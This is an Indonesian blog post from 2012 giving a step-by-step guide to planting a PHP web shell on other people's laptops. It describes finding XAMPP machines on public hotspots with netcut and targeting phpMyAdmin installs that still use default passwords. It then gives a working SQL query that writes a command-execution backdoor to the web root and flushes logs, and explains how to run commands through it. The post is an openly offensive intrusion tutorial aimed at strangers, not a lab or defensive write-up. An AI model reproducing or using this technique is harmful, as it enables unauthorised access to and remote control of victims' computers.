Kamis, 28 Juni 2012

Cara Upload Shell Melalui phpmyadmin



Kali ini Saya mau share cara upload shell via phpmyadmin. Dalam hal ini pastinya kita butuh korban dan target apa target dan korban..
Kalau di tempat umum yang berhotspot kita bisa menggunakan yang namanya netcut untuk mengetahui ip address laptop-laptop yang sedang OL disitu lalu kita cek 1 per 1 apakah alamat_ip/xamp


jika sudah menemukan dan phpmyadminnya masih berpassword default maka langkah selanjutnya adalah membuka SQL query pada phpmyadmin kemudian masukan kode berikut ini


use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_GET["cmd"]; if (!empty($cmd)) { echo "<pre>"; system($cmd); echo "</pre>"; exit; } ?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;


untuk mengaksesnya kita dapat mengetik di browser alamat_ip/cmd.php?cmd=[perintah]
Enter your email address:

Tidak ada komentar:

Posting Komentar